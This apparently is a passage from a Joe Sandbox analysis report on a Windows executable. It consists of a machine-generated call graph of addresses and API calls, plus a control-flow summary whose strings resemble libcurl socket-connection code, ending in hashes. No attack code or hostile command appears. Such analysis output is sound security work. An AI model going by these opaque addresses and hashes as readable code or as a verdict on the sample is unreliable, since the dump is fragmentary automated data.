37881->37780 37882->37835 37883->37828 37884->37833 37885->37849 37886->37835 37887->37848 37888->37824 37889->37835 37890->37835 37891->37835 37892->37831 37893->37831 37894->37853 37895->37868 37896->37738 37897->37738 37898->37731 37899->37738 37900->37738 37901->37744 37902 4665e0 37920 3c2310 EnterCriticalSection 37902->37920 37904 466604 37905 4667a1 37904->37905 37918 46660f 37904->37918 37932 3867d0 malloc memset 37905->37932 37906 4666c5 37931 3c2330 LeaveCriticalSection 37906->37931 37908 4667b5 37908->37906 37933 3656d0 13 API calls 37908->37933 37910 466793 37912 4667c8 37934 36b270 13 API calls 37912->37934 37918->37906 37918->37912 37921 3c0d10 malloc memset 37918->37921 37922 386950 37918->37922 37928 3c1130 memmove 37918->37928 37929 3c1440 13 API calls 37918->37929 37930 365140 13 API calls 37918->37930 37920->37904 37921->37918 37923 386978 37922->37923 37926 386996 37922->37926 37923->37926 37935 387a10 free 37923->37935 37925 386a58 37925->37926 37927 386a60 memset 37925->37927 37926->37918 37927->37926 37928->37918 37929->37918 37930->37918 37931->37910 37932->37908 37933->37912 37934->37906 37935->37925 37936 2363e5 37937 236401 strchr 37936->37937 37938 2368dc 37936->37938 37940 236427 37937->37940 37941 236414 strchr 37937->37941 37939 236bbf _strdup 37938->37939 37942 2368f0 strcmp 37938->37942 37943 236bd4 strlen 37939->37943 37998 235d54 37939->37998 37945 236437 strcmp 37940->37945 37946 236fd8 _strdup 37940->37946 37941->37940 37944 236fce 37941->37944 37948 23690c fopen 37942->37948 37961 236eb1 37942->37961 37950 2370fa 37943->37950 37944->37946 37947 2370e1 _strdup 37944->37947 37951 23644d fopen 37945->37951 37959 236f75 37945->37959 37949 236fed strlen 37946->37949 37946->37998 37947->37950 37947->37998 37952 236924 37948->37952 37966 236934 37948->37966 37953 23703b 37949->37953 37962 2370b8 37950->37962 37999 235d0c 37950->37999 37954 236463 37951->37954 37955 236ffe 37951->37955 38012 239db0 15 API calls 37952->38012 38019 241d90 10 API calls 37953->38019 38011 23e8c0 realloc fread realloc free free 37954->38011 38017 239db0 15 API calls 37955->38017 37956 236ed6 38014 23e8c0 realloc fread realloc free free 37956->38014 37957 236efd 38001 23e7e0 37957->38001 38015 231560 _fileno _setmode 37959->38015 37961->37966 37969 236ec5 37961->37969 37962->37950 37975 23711e malloc 37962->37975 37966->37956 37966->37957 37967 23700e 38018 23e8c0 realloc fread realloc free free 37967->38018 38013 231560 _fileno _setmode 37969->38013 37970 23704a free 37976 237070 strlen malloc 37970->37976 37970->37998 37971 236475 37977 236fad 37971->37977 37990 237027 37971->37990 37972 236ef2 37978 236f22 37972->37978 37979 236efb 37972->37979 37983 238e75 free free 37975->37983 37984 23713e memcpy memcpy free free 37975->37984 37985 237096 37976->37985 37986 238e94 37976->37986 37977->37990 37995 236fbc fclose 37977->37995 37989 236f3e 37978->37989 37997 236f35 fclose 37978->37997 37979->37989 37981 237022 37981->37990 37982 236f15 strlen 37982->37978 37983->37998 37984->37999 37991 2370be strcpy 37985->37991 37992 23709e 37985->37992 37986->37998 37987 236f91 38016 23e8c0 realloc fread realloc free free 37987->38016 37989->37950 37996 236f52 _strdup 37989->37996 37989->37998 37990->37947 37990->37953 37990->37998 37991->37962 37993 243380 9 API calls 37992->37993 37993->37962 37995->37990 37995->37998 37996->37950 37996->37998 37997->37989 37999->37998 38010 239db0 15 API calls 37999->38010 38002 23e800 fgets 38001->38002 38003 236f08 38001->38003 38002->38003 38006 23e819 38002->38006 38003->37978 38003->37982 38004 23e820 strchr 38005 23e832 strchr 38004->38005 38004->38006 38005->38006 38007 23e844 strlen realloc 38005->38007 38006->38004 38006->38005 38006->38007 38008 23e861 strcpy fgets 38007->38008 38009 23e8aa free 38007->38009 38008->38003 38008->38004 38009->38003 38010->37999 38011->37971 38012->37966 38013->37956 38014->37972 38015->37987 38016->37971 38017->37967 38018->37981 38019->37970 38020 387b70 38021 387b85 38020->38021 38022 387bf0 38021->38022 38023 387b89 38021->38023 38024 387baf malloc 38021->38024 38025 387bbd memset 38023->38025 38026 387bd1 38023->38026 38024->38023 38025->38026 38027 2313c9 38028 2313e3 _amsg_exit 38027->38028 38029 2311c5 38027->38029 38030 2313fd _initterm 38028->38030 38033 2311ea 38028->38033 38029->38030 38029->38033 38031 231423 38030->38031 38030->38033 38033->38031 38050 4b7b50 38033->38050 38034 23121c SetUnhandledExceptionFilter 38035 23123d 38034->38035 38036 231242 __p__acmdln 38035->38036 38037 231259 malloc 38036->38037 38039 2312f8 38037->38039 38040 231310 strlen malloc memcpy 38039->38040 38040->38040 38041 231346 38040->38041 38076 4b7680 38041->38076 38043 23135f 38044 23139e 38043->38044 38045 23146c exit 38043->38045 38046 2313b2 38044->38046 38047 2313a8 _cexit 38044->38047 38081 4b76c0 38045->38081 38047->38046 38049 231492 38052 4b7b70 38050->38052 38074 4b7b63 38050->38074 38051 4b7bcf 38053 4b7bdc 38051->38053 38051->38074 38052->38051 38055 4b7dc0 38052->38055 38056 4b7d31 38052->38056 38072 4b7c2b 38052->38072 38052->38074 38057 4b7c28 38053->38057 38085 4b7a00 12 API calls 38053->38085 38058 4b7e30 38055->38058 38060 4b7dea 38055->38060 38061 4b7e45 signal 38055->38061 38056->38052 38062 4b7a00 12 API calls 38056->38062 38057->38072 38059 4b7e81 signal 38058->38059 38063 4b7e3e 38058->38063 38064 4b7ebc signal 38058->38064 38065 4b7e12 38059->38065 38067 4b7e9a signal 38059->38067 38068 4b7eb5 38060->38068 38069 4b7df5 signal 38060->38069 38061->38065 38066 4b7f05 signal 38061->38066 38062->38056 38063->38061 38063->38065 38064->38065 38070 4b7f25 signal 38064->38070 38065->38059 38075 4b7e16 38065->38075 38066->38075 38067->38075 38068->38064 38068->38065 38069->38065 38071 4b7f3e signal 38069->38071 38070->38075 38071->38075 38073 4b7c54 VirtualProtect 38072->38073 38072->38074 38073->38072 38074->38034 38075->38034 38077 4b7689 38076->38077 38080 4b7630 38076->38080 38077->38043 38079 4b765b 38079->38043 38086 2314c0 _onexit 38080->38086 38082 4b76e3 38081->38082 38083 4b76f2 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 38081->38083 38082->38049 38084 4b7749 38083->38084 38084->38049 38085->38053 38086->38079 38087 23f390 38088 23f39e 38087->38088 38089 23f4a4 strcmp 38088->38089 38128 2396b0 GetEnvironmentVariableA 38088->38128 38091 23f4b6 fopen 38089->38091 38124 23f4c6 38089->38124 38091->38124 38093 23f3d1 strlen 38095 23f499 free 38093->38095 38096 23f3ec 38093->38096 38094 23f42d 38094->38089 38095->38089 38098 243380 9 API calls 38096->38098 38097 23f95f 38099 23f40b fopen 38098->38099 38101 23f420 fclose 38099->38101 38102 23f434 GetModuleFileNameA 38099->38102 38100 23f520 fgets 38100->38124 38101->38095 38102->38095 38104 23f44e strrchr 38102->38104 38103 23f93f 38103->38097 38114 23f954 fclose 38103->38114 38104->38095 38108 23f45d strlen 38104->38108 38105 23f580 _strdup 38105->38103 38111 23f593 strchr 38105->38111 38106 23f537 strlen strlen realloc 38109 23f563 strcpy 38106->38109 38110 23f936 free 38106->38110 38107 23f500 free 38107->38124 38108->38095 38112 23f477 38108->38112 38109->38111 38110->38103 38111->38100 38111->38124 38113 243380 9 API calls 38112->38113 38115 23f494 38113->38115 38114->38097 38115->38095 38116 239db0 15 API calls 38116->38124 38118 23f7db strcmp 38118->38124 38119 23f844 free 38120 23f84d free 38119->38120 38120->38124 38121 23f717 malloc 38123 23f73a 38121->38123 38123->38118 38123->38124 38145 2327c0 memset 38123->38145 38124->38097 38124->38100 38124->38103 38124->38105 38124->38106 38124->38107 38124->38116 38124->38118 38124->38119 38124->38120 38124->38121 38125 23f85b strlen malloc 38124->38125 38139 235a00 38124->38139 38125->38124 38126 23f878 free 38125->38126 38126->38103 38129 2396d2 38128->38129 38130 2396e6 GetEnvironmentVariableA 38128->38130 38129->38130 38131 2396d9 _strdup 38129->38131 38132 239713 38130->38132 38133 2396ff 38130->38133 38131->38130 38134 239735 38131->38134 38146 239740 GetEnvironmentVariableA strchr ExpandEnvironmentStringsA strchr _strdup 38132->38146 38133->38132 38135 239706 _strdup 38133->38135 38134->38093 38134->38094 38135->38132 38135->38134 38137 239722 38137->38134 38147 239740 GetEnvironmentVariableA strchr ExpandEnvironmentStringsA strchr _strdup 38137->38147 38140 235a21 38139->38140 38141 235a2b strlen strncmp 38139->38141 38140->38141 38143 235a90 38140->38143 38141->38143 38142 235b0a 38142->38124 38143->38142 38148 239db0 15 API calls 38143->38148 38145->38123 38146->38137 38147->38134 38148->38143 38149 239f90 38150 239fc5 38149->38150 38154 239f97 38149->38154 38151 239fd8 38150->38151 38152 239fcd 38150->38152 38159 233a10 malloc 38152->38159 38154->38149 38154->38150 38158 244180 6 API calls 38154->38158 38155 239fd2 38160 233a40 18 API calls 38155->38160 38158->38154 38159->38155 38160->38151 38161 23d996 38162 23d9a3 38161->38162 38163 23d9be 38161->38163 38281 240260 22 API calls 38162->38281 38164 23d9f8 38163->38164 38229 23a69f 38163->38229 38282 240260 22 API calls 38163->38282 38167 23da2f 38164->38167 38164->38229 38283 240260 22 API calls 38164->38283 38169 23da66 38167->38169 38167->38229 38284 240260 22 API calls 38167->38284 38169->38229 38285 2415c0 GetTickCount 38169->38285 38172 23daa2 38173 23dad1 38172->38173 38174 23daba 38172->38174 38248 243c60 38173->38248 38286 2338c0 malloc 38174->38286 38177 23dabf 38195 23dacb 38177->38195 38177->38229 38178 243610 9 API calls 38178->38229 38179 23af91 fclose 38179->38229 38180 23aa30 fwrite 38180->38229 38185 23b08f free free 38187 23b141 _close 38185->38187 38185->38229 38187->38229 38189 23dcb0 fflush _fileno 38293 2324c0 _get_osfhandle _lseeki64 SetEndOfFile 38189->38293 38190 23b185 free 38194 23e28c 38190->38194 38200 23e292 38190->38200 38191 243610 9 API calls 38191->38195 38296 241040 free free free 38194->38296 38195->38173 38195->38189 38195->38191 38197 23dce7 fseek 38195->38197 38287 243e40 11 API calls 38195->38287 38288 232510 21 API calls 38195->38288 38289 2435e0 9 API calls 38195->38289 38290 2415c0 GetTickCount 38195->38290 38291 239db0 15 API calls 38195->38291 38292 240610 Sleep 38195->38292 38197->38195 38198 23e120 _strdup 38199 23e14b _strdup 38198->38199 38198->38229 38199->38229 38202 23e304 free 38200->38202 38201 23e188 strcmp 38201->38229 38203 23e318 38202->38203 38204 23e32c free free free 38202->38204 38297 241040 free free free 38203->38297 38213 23a1e1 38204->38213 38207 23e5d0 strcmp strcmp 38207->38229 38211 23a733 _stati64 38211->38229 38212 23e1cd free 38218 23a6e6 38212->38218 38212->38229 38216 23a1e5 free 38213->38216 38215 23a773 fopen 38215->38218 38270 23e510 free free free free 38216->38270 38222 239de0 10 API calls 38218->38222 38218->38229 38272 232f90 22 API calls 38218->38272 38294 241370 41 API calls 38218->38294 38295 239db0 15 API calls 38218->38295 38220 23a20f 38223 23a23b 38220->38223 38226 23a232 fclose 38220->38226 38221 23a93a _open 38224 23a954 _fstati64 38221->38224 38221->38229 38222->38218 38227 23a245 free 38223->38227 38228 23a25f 38223->38228 38224->38229 38225 239de0 10 API calls 38225->38229 38226->38223 38227->38228 38229->38178 38229->38179 38229->38180 38229->38185 38229->38190 38229->38198 38229->38201 38229->38207 38229->38211 38229->38215 38229->38218 38229->38221 38229->38225 38230 239de0 10 API calls 38229->38230 38231 23ab49 _fileno _isatty 38229->38231 38233 23abf9 strstr strrchr 38229->38233 38236 23ac9b strcmp 38229->38236 38239 23acbe strcmp 38229->38239 38242 23ac69 free 38229->38242 38245 23aac6 _errno strerror 38229->38245 38247 240260 22 API calls 38229->38247 38271 23e6f0 27 API calls 38229->38271 38273 239db0 15 API calls 38229->38273 38274 231560 _fileno _setmode 38229->38274 38275 23e610 17 API calls 38229->38275 38276 24c470 ioctlsocket 38229->38276 38278 2435e0 9 API calls 38229->38278 38280 2433e0 9 API calls 38229->38280 38232 23a984 _close 38230->38232 38231->38229 38232->38229 38233->38229 38234 23ac22 strchr 38233->38234 38279 2433e0 9 API calls 38234->38279 38236->38229 38236->38239 38239->38229 38242->38229 38243 23a8bd strcmp 38243->38229 38277 239db0 15 API calls 38245->38277 38247->38229 38249 243c6f 38248->38249 38250 243c9d 38248->38250 38251 243c85 38249->38251 38252 243ca7 38249->38252 38250->38195 38316 267140 13 API calls 38251->38316 38254 243cba 38252->38254 38298 245dc0 38252->38298 38254->38250 38302 248ef0 6 API calls 38254->38302 38255 243c90 38255->38250 38258 243ce9 38303 245ef0 23 API calls 38258->38303 38260 243cf3 38261 243cfa 38260->38261 38267 243d24 38260->38267 38317 248ce0 43 API calls 38261->38317 38266 243dbf 38319 246370 40 API calls 38266->38319 38267->38266 38304 246f90 38267->38304 38310 2494f0 10 API calls 38267->38310 38311 24b4e0 38267->38311 38318 247360 37 API calls 38267->38318 38270->38220 38271->38229 38272->38218 38273->38229 38274->38243 38275->38229 38276->38229 38277->38229 38278->38229 38279->38229 38280->38229 38281->38163 38282->38164 38283->38167 38284->38169 38285->38172 38286->38177 38287->38195 38288->38195 38289->38195 38290->38195 38291->38195 38292->38195 38293->38195 38294->38212 38295->38218 38299 245dd1 38298->38299 38301 245e28 38299->38301 38320 24dda0 38299->38320 38301->38254 38302->38258 38303->38260 38306 246fa9 38304->38306 38305 25d170 10 API calls 38308 24704f 38305->38308 38306->38305 38306->38308 38309 24722d 38306->38309 38308->38309 38357 24b890 38308->38357 38309->38267 38310->38267 38312 24b506 38311->38312 38313 24b4eb 38311->38313 38312->38267 38314 24b4f6 WSASetLastError 38313->38314 38315 24b4ed Sleep 38313->38315 38314->38312 38315->38312 38316->38255 38317->38250 38318->38267 38319->38250 38325 243c20 38320->38325 38322 24ddab 38323 24dddd 38322->38323 38331 267d30 13 API calls 38322->38331 38323->38301 38326 243c39 38325->38326 38327 243c2a 38325->38327 38330 243c49 38326->38330 38346 2683f0 calloc 38326->38346 38332 243a60 38327->38332 38330->38322 38331->38323 38333 243a89 38332->38333 38345 243a7e 38332->38345 38334 243b0f WSAStartup 38333->38334 38338 243ad2 38333->38338 38333->38345 38335 243b25 38334->38335 38334->38345 38336 243b30 38335->38336 38337 243b3f WSACleanup 38335->38337 38339 24c0a0 21 API calls 38336->38339 38337->38345 38340 24a740 2 API calls 38338->38340 38338->38345 38339->38338 38341 243ae0 38340->38341 38353 2bf870 14 API calls 38341->38353 38343 243ae7 38343->38345 38354 241ae0 12 API calls 38343->38354 38345->38326 38347 268430 38346->38347 38348 268410 38346->38348 38347->38330 38348->38347 38349 268473 38348->38349 38351 2684d7 38348->38351 38355 268130 getenv ExpandEnvironmentStringsA memset 38349->38355 38356 251aa0 memset 38351->38356 38353->38343 38354->38345 38355->38347 38356->38347 38358 24b8cc 38357->38358 38361 24b8ac 38357->38361 38359 24bc93 WSASetLastError 38358->38359 38360 24b8dc Sleep 38358->38360 38375 24bc6f 38358->38375 38359->38375 38360->38375 38361->38358 38362 24b8e8 38361->38362 38363 25d170 10 API calls 38362->38363 38369 24b911 38362->38369 38363->38369 38364 24bc74 38364->38359 38365 24bc87 Sleep 38364->38365 38364->38375 38365->38375 38366 24bbd2 select 38367 24bc18 WSAGetLastError 38366->38367 38374 24bca8 38366->38374 38368 24bb65 38367->38368 38368->38366 38370 25d170 10 API calls 38368->38370 38368->38375 38369->38364 38369->38368 38370->38368 38371 24bcce __WSAFDIsSet 38372 24bce4 __WSAFDIsSet 38371->38372 38371->38374 38373 24bcfc __WSAFDIsSet 38372->38373 38372->38374 38373->38374 38374->38371 38374->38372 38374->38373 38374->38375 38375->38309 38376 247771 38391 2448f0 38376->38391 38378 248cac 38380 248cb7 38453 267140 13 API calls 38380->38453 38382 248cc3 38382->38378 38383 246090 23 API calls 38389 247580 38383->38389 38385 266fb0 13 API calls 38385->38389 38387 267140 13 API calls 38388 247691 38387->38388 38388->38387 38388->38389 38389->38378 38389->38380 38389->38383 38389->38385 38389->38388 38430 246680 38389->38430 38450 244550 10 API calls 38389->38450 38451 2685c0 15 API calls 38389->38451 38452 25e590 24 API calls 38389->38452 38392 244916 38391->38392 38393 244928 38391->38393 38392->38389 38394 25d170 10 API calls 38393->38394 38395 24492d 38394->38395 38396 2449be 38395->38396 38425 24499d 38395->38425 38483 267140 13 API calls 38396->38483 38398 2449c9 38398->38392 38400 244afd SleepEx getsockopt 38403 244b38 WSAGetLastError 38400->38403 38400->38425 38401 244f5d 38401->38392 38402 244f73 38401->38402 38488 249f70 35 API calls 38402->38488 38405 244b7d 38403->38405 38403->38425 38404 244e53 38404->38401 38409 244ff0 closesocket 38404->38409 38407 244ea2 38405->38407 38411 244ff0 closesocket 38405->38411 38406 244b8a SleepEx getsockopt 38410 244bc5 WSAGetLastError 38406->38410 38406->38425 38472 268c70 38407->38472 38409->38401 38410->38425 38411->38407 38413 244c81 WSASetLastError 38413->38425 38414 244fb4 38489 267140 13 API calls 38414->38489 38415 266fb0 13 API calls 38415->38425 38418 2452b0 143 API calls 38427 244df7 38418->38427 38420 244eec 38423 244700 58 API calls 38420->38423 38424 244efc 38423->38424 38487 268d70 13 API calls 38424->38487 38425->38400 38425->38405 38425->38406 38425->38413 38425->38415 38425->38427 38428 244ff0 closesocket 38425->38428 38429 2452b0 143 API calls 38425->38429 38454 24b510 38425->38454 38484 25d820 18 API calls 38425->38484 38485 249f70 35 API calls 38425->38485 38427->38392 38427->38401 38427->38404 38427->38418 38428->38425 38429->38425 38431 246699 38430->38431 38448 24679e 38430->38448 38493 24d5d0 38431->38493 38433 2466ad 38435 24672e 38433->38435 38508 25e530 24 API calls 38433->38508 38436 246785 38435->38436 38509 246090 23 API calls 38435->38509 38436->38448 38504 25d860 38436->38504 38439 2467da free 38442 2467ff 38439->38442 38440 246855 38510 2685c0 15 API calls 38440->38510 38442->38440 38443 246888 38442->38443 38444 243380 9 API calls 38443->38444 38445 2468db 38444->38445 38511 24e360 25 API calls 38445->38511 38447 2468e4 38447->38448 38449 266fb0 13 API calls 38447->38449 38448->38389 38449->38448 38450->38389 38451->38389 38452->38389 38453->38382 38455 24b53d 38454->38455 38456 24b55e 38454->38456 38455->38456 38457 24b542 38455->38457 38459 25d170 10 API calls 38456->38459 38465 24b57d 38456->38465 38458 24b7b7 38457->38458 38460 24b552 Sleep 38457->38460 38461 24b613 WSASetLastError 38457->38461 38458->38425 38459->38465 38460->38458 38461->38458 38462 24b732 select 38463 24b76c WSAGetLastError 38462->38463 38464 24b7b9 38462->38464 38463->38465 38464->38458 38466 24b806 38464->38466 38467 24b7cd __WSAFDIsSet __WSAFDIsSet 38464->38467 38465->38458 38465->38462 38468 25d170 10 API calls 38465->38468 38469 24b814 __WSAFDIsSet __WSAFDIsSet 38466->38469 38470 24b841 38466->38470 38467->38466 38468->38465 38469->38470 38470->38458 38471 24b84d __WSAFDIsSet __WSAFDIsSet 38470->38471 38471->38458 38473 268c7f 38472->38473 38474 244ebb 38472->38474 38475 268d06 38473->38475 38476 268cb0 38473->38476 38474->38392 38474->38420 38486 25f240 10 API calls 38474->38486 38492 267140 13 API calls 38475->38492 38478 268cb7 38476->38478 38479 268ccf 38476->38479 38490 276ce0 131 API calls 38478->38490 38491 277120 153 API calls 38479->38491 38482 268d12 38482->38474 38483->38398 38484->38425 38485->38425 38486->38420 38487->38427 38488->38414 38489->38398 38490->38474 38491->38474 38492->38482 38494 24d5e0 38493->38494 38495 24d64f 38493->38495 38494->38495 38512 283f80 WaitForSingleObject CloseHandle 38494->38512 38497 24d5f1 38498 24d607 38497->38498 38499 24d631 38497->38499 38513 267140 13 API calls 38498->38513 38501 24d4b0 6 API calls 38499->38501 38503 24d638 38501->38503 38502 24d62e 38502->38499 38503->38433 38505 25d871 38504->38505 38507 25d8bc 38504->38507 38506 25d88d time 38505->38506 38505->38507 38506->38507 38507->38439 38508->38435 38509->38436 38510->38448 38511->38447 38512->38497 38513->38502 38514 239bda 38524 243bd0 38514->38524 38516 239be8 free 38517 239c10 38516->38517 38518 239c00 38516->38518 38519 239c2d free 38517->38519 38521 239c24 fclose 38517->38521 38518->38517 38520 239c07 fclose 38518->38520 38529 232850 38519->38529 38520->38517 38521->38519 38525 243bd9 38524->38525 38528 243be1 38524->38528 38526 243bfa WSACleanup 38525->38526 38525->38528 38539 24c110 38526->38539 38528->38516 38530 232f79 38529->38530 38534 232861 38529->38534 38531 232870 27 API calls 38531->38534 38532 232adc free free 38533 232b61 31 API calls 38532->38533 38532->38534 38537 232e69 38533->38537 38534->38531 38534->38532 38535 232b20 free free free free 38534->38535 38535->38533 38535->38535 38538 232ef2 6 API calls 38537->38538 38542 251bb0 memset 38537->38542 38538->38530 38538->38531 38540 24c134 38539->38540 38541 24c119 FreeLibrary 38539->38541 38540->38528 38541->38540 38542->38537

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 29 2452b0-2452e7 call 245c20 32 2452f3-245316 call 244690 29->32 33 2452e9-2452f2 29->33 36 24531c-245339 call 266fb0 32->36 37 245408-24543e _errno call 249f70 call 267140 call 244ff0 32->37 42 245340-245348 36->42 43 24533b-24533e 36->43 75 245446 37->75 45 245398-2453a2 call 2450d0 42->45 46 24534a-245355 42->46 43->42 43->45 56 2453a5-2453b3 45->56 49 2455a5-2455b5 call 2450d0 46->49 50 24535b-24537f setsockopt 46->50 49->56 63 2455bb-2455da setsockopt 49->63 54 245385-245393 call 266fb0 50->54 55 245582-24559e WSAGetLastError call 249f70 call 266fb0 50->55 72 2455a1 54->72 55->72 61 245449 56->61 62 2453b9-2453e5 call 2496b0 * 2 56->62 70 24544b-245455 61->70 62->75 102 2453e7-2453f2 62->102 68 2455e0-24564e call 24c510 * 2 WSAIoctl 63->68 69 24566f-24567e call 266fb0 63->69 68->56 97 245654-24566a WSAGetLastError call 266fb0 68->97 69->56 76 245457-24545a 70->76 77 245460-2454a0 call 26d540 70->77 72->49 75->61 76->77 81 2459e2-245a05 call 24c470 call 25d170 76->81 88 2454a2-2454a4 77->88 89 2454b3-2454cf 77->89 111 245a07-245a18 call 246090 81->111 112 245a1b-245a1d 81->112 88->89 93 2454a6-2454ae 88->93 94 245540-24554a 89->94 95 2454d1-2454e6 strlen 89->95 93->81 100 245887-2458a1 htons 94->100 101 245550-245558 94->101 95->94 99 2454e8-245514 memset strncmp 95->99 97->56 105 245683-24568f 99->105 106 24551a-245531 strncmp 99->106 107 2458a6-2458ab 100->107 101->107 108 24555e-245573 htons 101->108 102->70 109 2453f4-2453fe call 244ff0 102->109 116 245691-2456c0 call 26d5e0 105->116 117 2456f6-2456ff 106->117 118 245537-24553b 106->118 113 2458e0-2458e8 bind 107->113 119 245578-24557d 108->119 109->37 111->112 114 245a1f-245a26 112->114 115 245a8a-245a8d 112->115 124 245929-245956 getsockname 113->124 125 2458ea-2458ed 113->125 114->115 122 245a28-245a2f 114->122 127 245a8f 115->127 146 245701-245722 call 266fb0 116->146 147 2456c2-2456c5 116->147 126 245736-24574b 117->126 118->116 119->107 132 245a96-245ab2 connect 122->132 133 245a31-245a42 WSAGetLastError 122->133 137 2459a1-2459e0 WSAGetLastError call 249f70 call 267140 124->137 138 245958-245983 call 266fb0 124->138 135 2458b0-2458dc call 266fb0 htons 125->135 136 2458ef-245927 WSAGetLastError call 249f70 call 267140 125->136 130 24574d-245750 126->130 131 245759 126->131 127->132 141 245752-245757 130->141 142 245768-245784 call 25dd20 130->142 145 24575e-245762 131->145 132->133 139 245ab8-245ac0 132->139 133->139 143 245a44-245a47 133->143 135->113 165 245985-245999 call 244ff0 136->165 137->81 137->165 138->81 138->165 139->127 141->145 171 245794-2457a4 142->171 172 245786-245791 call 24d660 142->172 143->139 151 245a49-245a80 call 249f70 call 266fb0 call 244ff0 143->151 145->142 175 2457f4-245804 146->175 153 2456c7-2456c9 147->153 154 2456ea-2456f1 147->154 151->115 161 245727-245730 153->161 162 2456cb-2456d1 153->162 154->165 161->126 167 24583b-245861 call 267140 161->167 162->126 170 2456d3-2456e5 call 267140 162->170 165->137 167->165 170->154 183 245834-245837 171->183 184 2457aa-2457f1 call 25d820 call 266fb0 call 25df40 171->184 172->171 177 245866-245885 call 249a20 175->177 178 245806-245809 175->178 177->100 177->107 178->107 185 24580f-245823 strchr 178->185 183->167 184->175 192 245ac2 185->192 193 245829-24582f 185->193 197 245ac4-245ae2 call 249a20 192->197 193->197 205 245ae4-245afc htons 197->205 206 245b17-245b1e 197->206 207 245afe-245b07 atoi 205->207 208 245b0b-245b12 205->208 206->107 207->208 208->119
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00245C20: memcpy.MSVCRT(?,?,00000080), ref: 00245C88
                                                                                                                                                                                                                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00245377
                                                                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000008,00000001,00000004), ref: 002455D2
                                                                                                                                                                                                                                                            • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00245646
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 00245654
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 002457D5
                                                                                                                                                                                                                                                            • Local port: %hu, xrefs: 0024595C
                                                                                                                                                                                                                                                            • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00245670
                                                                                                                                                                                                                                                            • host!, xrefs: 00245520
                                                                                                                                                                                                                                                            • if!, xrefs: 00245505
                                                                                                                                                                                                                                                            • bind failed with errno %d: %s, xrefs: 00245911
                                                                                                                                                                                                                                                            • Could not set TCP_NODELAY: %s, xrefs: 00245593
                                                                                                                                                                                                                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00245423
                                                                                                                                                                                                                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00245711
                                                                                                                                                                                                                                                            • Couldn't bind to '%s', xrefs: 0024584A
                                                                                                                                                                                                                                                            • Couldn't bind to interface '%s', xrefs: 002456D4
                                                                                                                                                                                                                                                            • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 0024565C
                                                                                                                                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 002459C7
                                                                                                                                                                                                                                                            • Bind to local port %hu failed, trying next, xrefs: 002458B5
                                                                                                                                                                                                                                                            • Immediate connect fail for %s: %s, xrefs: 00245A5C
                                                                                                                                                                                                                                                            • TCP_NODELAY set, xrefs: 00245385
                                                                                                                                                                                                                                                            • Trying %s..., xrefs: 0024531D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: setsockopt$ErrorIoctlLastmemcpy
                                                                                                                                                                                                                                                            • String ID: Trying %s...$Bind to local port %hu failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$TCP_NODELAY set$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                                                                                                                                            • API String ID: 1062783977-1182436171
                                                                                                                                                                                                                                                            • Opcode ID: 372c38d48f806caea5a3b4149fc17c93ce60af0c2e9afb0ddebd4b7513c122e9
                                                                                                                                                                                                                                                            • Instruction ID: adba0db5402b1a364cf1acf940d6e76f9df591c078b20ce92aa7552065ae6748
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 372c38d48f806caea5a3b4149fc17c93ce60af0c2e9afb0ddebd4b7513c122e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D22DF71924711AFD7249F14DC46B6FB7E9EF84304F14082AF88997292E771ED24CBA2

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
